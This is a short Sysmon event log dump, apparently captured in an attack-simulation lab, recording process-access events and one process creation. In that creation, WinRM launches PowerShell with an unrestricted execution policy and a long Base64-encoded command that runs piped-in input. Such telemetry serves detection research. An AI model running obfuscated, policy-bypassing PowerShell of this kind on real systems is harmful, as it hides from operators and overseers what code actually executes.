{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8472,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.771\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nSourceProcessId: 1312\r\nSourceThreadId: 1548\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22D1-5F25-0000-00100BAD1100}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.771","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","SourceProcessId":"1312","SourceThreadId":"1548","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22D1-5F25-0000-00100BAD1100}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8473,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.787\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.787","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8474,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.787\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.787","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8475,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.787\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.787","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":8476,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.798\r\nProcessGuid: {41C8662E-22D1-5F25-0000-001012B01100}\r\nProcessId: 5064\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-22D1-5F25-0000-00205EAC1100}\r\nLogonId: 0x11AC5E\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-22D1-5F25-0000-00100BAD1100}\r\nParentProcessId: 1348\r\nParentImage: C:\\Windows\\System32\\winrshost.exe\r\nParentCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.798","ProcessGuid":"{41C8662E-22D1-5F25-0000-001012B01100}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-22D1-5F25-0000-00205EAC1100}","LogonId":"0x11ac5e","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-22D1-5F25-0000-00100BAD1100}","ParentProcessId":"1348","ParentImage":"C:\\Windows\\System32\\winrshost.exe","ParentCommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
